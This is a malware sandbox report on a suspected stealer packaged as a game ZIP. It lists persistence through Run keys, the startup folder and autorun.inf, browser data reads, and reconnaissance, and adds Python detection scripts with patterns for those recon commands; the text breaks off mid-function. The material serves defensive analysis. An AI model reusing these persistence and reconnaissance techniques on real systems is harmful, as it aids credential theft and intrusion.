Analysis Overview
SHA256
ecd7c29e5959cbecb7332114b06956e215b1a5b351f55d95aaa16b514f89385f
Threat Level: Shows suspicious behavior
The file Beta Curse Of Twilight.zip was found to be: Shows suspicious behavior.
Malicious Activity Summary
Reads user/profile data of web browsers
Drops startup file
Loads dropped DLL
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Drops autorun.inf file
Program crash
Unsigned PE
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Creates scheduled task(s)
Enumerates processes with tasklist
Suspicious use of FindShellTrayWindow
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Detects videocard installed
Views/modifies file attributes
Suspicious use of SetWindowsHookEx
Runs net.exe
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-03-02 22:43
Signatures
Unsigned PE
Analysis: behavioral5
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
124s
Max time network
164s
Command Line
Signatures
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
| N/A | bitbucket.org | N/A | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-1903027113-674645041-2759338396-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url C:\Users\Admin\AppData\Local\Temp\LICENSES.chromium.html
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.0.2039562987\455464182" -parentBuildID 20221007134813 -prefsHandle 1704 -prefMapHandle 1692 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {019158ec-da5e-4f03-9bcc-f7d97eef9b7f} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 1796 1f29dbf5058 gpu
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.1.505514600\1428057295" -parentBuildID 20221007134813 -prefsHandle 2144 -prefMapHandle 2140 -prefsLen 21608 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a54e6628-1c64-4c1b-b63e-703f37437fa8} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2172 1f28b672e58 socket
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.2.806926298\1848200382" -childID 1 -isForBrowser -prefsHandle 2840 -prefMapHandle 2816 -prefsLen 21646 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a3bd9d6-0b95-4228-a63f-2600f37cfc62} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 2912 1f2a1d0b258 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.3.567252275\1242879341" -childID 2 -isForBrowser -prefsHandle 3420 -prefMapHandle 3412 -prefsLen 26109 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f004befb-b66d-4b22-b683-423506948daf} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 3432 1f28b661f58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.4.812379313\886626858" -childID 3 -isForBrowser -prefsHandle 4724 -prefMapHandle 4712 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be925ab9-f186-4732-b4db-f9b0525e438e} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 4580 1f2a23fdf58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.5.294450091\1303026960" -childID 4 -isForBrowser -prefsHandle 4832 -prefMapHandle 4836 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0725436-9b41-4953-8af5-6e036dc6656e} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 4824 1f2a425eb58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3028.6.815832330\335564342" -childID 5 -isForBrowser -prefsHandle 5108 -prefMapHandle 5104 -prefsLen 26168 -prefMapSize 233444 -jsInitHandle 1280 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4bd44c2b-faee-4327-846e-c27ed37618f6} 3028 "\\.\pipe\gecko-crash-server-pipe.3028" 5116 1f2a425ee58 tab
Network
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
57s
Max time network
77s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\libEGL.dll,#1
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral12
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:47
Platform
win10-20240221-en
Max time kernel
131s
Max time network
137s
Command Line
Signatures
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\vk_swiftshader.dll,#1
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 96.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-03-02 22:42
Reported
2024-03-02 22:48
Platform
win10-20240221-en
Max time kernel
151s
Max time network
173s
Command Line
Signatures
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CurseOfTwilight.exe | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupP0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CurseOfTwilight.exe" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-885525822-3215264538-2232956653-1000\Software\Microsoft\Windows\CurrentVersion\Run\Start_P0HaCU = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_P0HaCU.vbs" | C:\Windows\system32\reg.exe | N/A |
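Both Run values above resolve into the roaming profile: a copy of the dropped executable under Themes\CachedFiles and a VBS launcher under Libraries, each carrying the same random-looking P0HaCU suffix. The following is an added example (my code, not the sandbox's and not the sample's) of triaging such values from a `reg export` of the Run key: it parses REG_SZ and REG_EXPAND_SZ values, resolves the launched executable, and flags entries that live in the user profile or rely on a script host. The .reg text is constructed from the two values in the table plus a legitimate OneDrive entry and a hypothetical REG_EXPAND_SZ "Updater" value for contrast; those two extra entries are not from this report.

```python
"""Triage exported Run keys for the persistence shape shown in this report.
Added example, not sandbox output: parses `reg export` (.reg) text and flags autostart
values that live in the user profile or lean on a script host. Sample dump is constructed."""
import re
from dataclasses import dataclass

RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run(?:Once)?$", re.I)
KEY_LINE_RE = re.compile(r"^\[(?P<key>[^\]]+)\]$")
VALUE_LINE_RE = re.compile(r'^(?:"(?P<name>(?:[^"\\]|\\.)*)"|(?P<default>@))=(?P<data>.*)$')
USER_PROFILE_RE = re.compile(r"\\Users\\[^\\]+\\AppData\\|%(?:APPDATA|LOCALAPPDATA|USERPROFILE|TEMP|TMP)%", re.I)
EXE_RE = re.compile(r'^\s*(?:"(?P<q>[^"]+)"|(?P<u>.+?\.(?:exe|com|scr|bat|cmd|vbs|vbe|js|jse|wsf|hta|ps1))(?=\s|$))', re.I)
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".bat", ".cmd", ".ps1")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe", "pwsh.exe", "rundll32.exe", "regsvr32.exe"}

@dataclass(frozen=True)
class RunEntry:
    key: str
    name: str
    command: str

@dataclass(frozen=True)
class Hit:
    entry: RunEntry
    reasons: tuple

    @property
    def severity(self) -> str:
        return "high" if {"script_host", "script_file"} & set(self.reasons) else "medium"

def _logical_lines(text):
    """Join .reg continuation lines (a trailing backslash continues hex data onto the next line)."""
    buf = ""
    for raw in text.splitlines():
        line = buf + raw.strip()
        if line.endswith("\\"):
            buf = line[:-1]
            continue
        buf = ""
        yield line

def _decode_data(data):
    """REG_SZ ("...") and REG_EXPAND_SZ (hex(2): UTF-16LE bytes) become str; other types return None."""
    if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
        return re.sub(r"\\(.)", r"\1", data[1:-1])  # unescape \\ and \"
    m = re.match(r"hex\(2\):(.*)$", data, re.I)
    if m:
        raw = bytes(int(b, 16) for b in m.group(1).split(",") if b.strip())
        return raw.decode("utf-16-le").rstrip("\x00")
    return None

def parse_run_entries(reg_text):
    key, out = None, []
    for line in _logical_lines(reg_text):
        k = KEY_LINE_RE.match(line)
        if k:  # only values under ...\CurrentVersion\Run or \RunOnce are autostarts
            key = k.group("key") if RUN_KEY_RE.search(k.group("key")) else None
            continue
        v = VALUE_LINE_RE.match(line) if key else None
        if v and (cmd := _decode_data(v.group("data"))) is not None:
            out.append(RunEntry(key, v.group("name") or "(Default)", cmd))
    return out

def assess(entry):
    m = EXE_RE.match(entry.command)
    exe = (m.group("q") or m.group("u")) if m else entry.command.strip().split(" ")[0]
    base = exe.rsplit("\\", 1)[-1].lower()
    reasons = []
    if USER_PROFILE_RE.search(entry.command):
        reasons.append("profile_path")
    if base in SCRIPT_HOSTS:
        reasons.append("script_host")
    if base.endswith(SCRIPT_EXTS) or any(tok.strip('"').lower().endswith(SCRIPT_EXTS) for tok in entry.command.split()):
        reasons.append("script_file")
    return Hit(entry, tuple(reasons)) if reasons else None

def triage(reg_text):
    return [h for h in map(assess, parse_run_entries(reg_text)) if h]

# Constructed dump: the two Run values from this analysis, a legitimate entry for contrast,
# and a hypothetical REG_EXPAND_SZ value to exercise the hex(2) and %APPDATA% paths.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"WindowsDriverSetupP0HaCU"="C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\CurseOfTwilight.exe"
"Start_P0HaCU"="C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Libraries\\sysWin10Boot_P0HaCU.vbs"
"OneDrive"="\"C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe\" /background"
"Updater"=hex(2):77,00,73,00,63,00,72,00,69,00,70,00,74,00,2e,00,65,00,78,00,65,00,20,00,\
  25,00,41,00,50,00,50,00,44,00,41,00,54,00,41,00,25,00,5c,00,61,00,2e,00,6a,00,73,00,00,00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00
'''

if __name__ == "__main__":
    for h in triage(SAMPLE_REG):
        print(f"{h.severity:6} {h.entry.name}: {h.entry.command}  [{', '.join(h.reasons)}]")
```

`reg export` writes UTF-16LE text, so read a real dump with `open(path, encoding="utf-16")` before handing it to `triage()`. A profile-path-only hit is rated medium on purpose: legitimate per-user installers (OneDrive, Discord, Teams) also autostart from AppData, so pair that rule with a signature or hash check before acting on it.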
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops autorun.inf file
| Description | Indicator | Process | Target |
| File created | F:\autorun.inf | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 (SeIncreaseWorkingSetPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 (SeIncreaseWorkingSetPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 (SeTimeZonePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 (SeCreateSymbolicLinkPrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 (SeDelegateSessionUserImpersonatePrivilege) | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
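Two details of the process tree that follows are worth noting. The `cmd.exe /d /s /c "<command>"` wrapper around every child is the exact form Node.js's child_process.exec uses on Windows, and the `--type=gpu-process ... --user-data-dir="C:\Users\Admin\AppData\Roaming\script"` children carry Chromium's own child-process flags; together with the libEGL.dll and vk_swiftshader.dll files detonated in behavioral8 and behavioral12, this is consistent with a Chromium-based (Electron-style) application driving the reconnaissance. Below is an added example (my code, not the sandbox's or the sample's) that scores such a tree from process-creation telemetry: it attributes each child back through the cmd.exe hop to the originating process, detects the tasklist.exe polling loop with a sliding window, deduplicates the reconnaissance commands seen here (net session, wmic csproduct get uuid, the BackupProductKeyDefault read, reg QUERY of the Uninstall key) into categories, and treats a reg.exe Run-key write into AppData as persistence. The sample tree is constructed from this report's process list; the pids, timings, the benign control process and the reg.exe ADD command line (the report shows the resulting Run value, not the command that wrote it) are assumptions.

```python
"""Score the recon-and-persist chain in this report from process-creation records
(Sysmon Event ID 1 style fields). Added example with a constructed sample tree, not sandbox output."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

@dataclass(frozen=True)
class ProcEvent:
    ts: float  # seconds since detonation start
    pid: int
    ppid: int
    image: str
    cmdline: str

# One category per reconnaissance command in the process list; a set, so repeats count once.
RECON_PATTERNS = {
    "hwid_uuid": re.compile(r"wmic\s+csproduct\s+get\s+uuid", re.I),
    "admin_check": re.compile(r"\bnet1?\s+session\b", re.I),
    "product_key": re.compile(r"SoftwareProtectionPlatform.*BackupProductKeyDefault", re.I),
    "installed_sw": re.compile(r'reg(?:\.exe)?\s+QUERY\s+"?HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall', re.I),
}
# reg.exe writing a Run value whose data lives in the user profile (shape assumed; the report shows only the value).
RUN_KEY_RE = re.compile(r'reg(?:\.exe)?\s+ADD\s+"?HK(?:CU|LM|EY_[A-Z_]+)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\b', re.I)
USER_WRITABLE_RE = re.compile(r"\\AppData\\(?:Roaming|Local)\\", re.I)
INTERMEDIARIES = {"cmd.exe", "net.exe"}  # hopped over when attributing a child to its origin
TASKLIST_BURST_COUNT, TASKLIST_BURST_WINDOW = 10, 60.0  # N tasklist spawns inside W seconds = polling loop

@dataclass
class Finding:
    origin_pid: int
    origin_image: str
    recon: set = field(default_factory=set)
    tasklist_spawns: int = 0
    tasklist_burst: bool = False
    persistence: list = field(default_factory=list)  # Run value names written from this origin

    @property
    def verdict(self) -> str:
        heavy = self.tasklist_burst or len(self.recon) >= 3
        return "high" if heavy and self.persistence else "medium" if heavy else "low" if self.recon else "none"

def origin_of(ev, by_pid):  # nearest ancestor that is not a cmd.exe/net.exe hop, with a pid-reuse cycle guard
    cur, seen = ev, {ev.pid}
    while True:
        parent = by_pid.get(cur.ppid)
        if parent is None or parent.pid in seen:
            return cur
        if parent.image.rsplit("\\", 1)[-1].lower() not in INTERMEDIARIES:
            return parent
        cur, seen = parent, seen | {parent.pid}

def analyze(events):
    by_pid = {e.pid: e for e in events}
    findings, tasklist_times = {}, defaultdict(list)
    for e in sorted(events, key=lambda x: x.ts):
        origin = origin_of(e, by_pid)
        f = findings.setdefault(origin.pid, Finding(origin.pid, origin.image))
        base = e.image.rsplit("\\", 1)[-1].lower()
        if base == "cmd.exe":
            continue  # score the child that actually runs, not the `cmd.exe /d /s /c` wrapper
        if base == "tasklist.exe":
            f.tasklist_spawns += 1
            tasklist_times[origin.pid].append(e.ts)
        f.recon.update(name for name, pat in RECON_PATTERNS.items() if pat.search(e.cmdline))
        if base == "reg.exe" and RUN_KEY_RE.search(e.cmdline) and USER_WRITABLE_RE.search(e.cmdline):
            m = re.search(r"/v\s+(\S+)", e.cmdline, re.I)
            f.persistence.append(m.group(1) if m else e.cmdline)
    for pid, times in tasklist_times.items():  # burst = N spawns within W seconds anywhere in the series
        t, n = sorted(times), TASKLIST_BURST_COUNT
        findings[pid].tasklist_burst = any(t[i + n - 1] - t[i] <= TASKLIST_BURST_WINDOW for i in range(len(t) - n + 1))
    return findings

def build_sample_events():
    """Constructed tree modelled on behavioral4 above; pids and timings are made up."""
    cot = r"C:\Users\Admin\AppData\Local\Temp\CurseOfTwilight.exe"
    cmd, wmic = r"C:\Windows\system32\cmd.exe", r"C:\Windows\System32\Wbem\WMIC.exe"
    tasklist, reg = r"C:\Windows\system32\tasklist.exe", r"C:\Windows\system32\reg.exe"
    ev = [ProcEvent(0.0, 4840, 1200, cot, f'"{cot}"')]
    pid, t = 5000, 1.0
    def wrapped(inner, child_image, child_cmd, step=1.0):  # cmd.exe /d /s /c "<inner>" under 4840, then its child
        nonlocal pid, t
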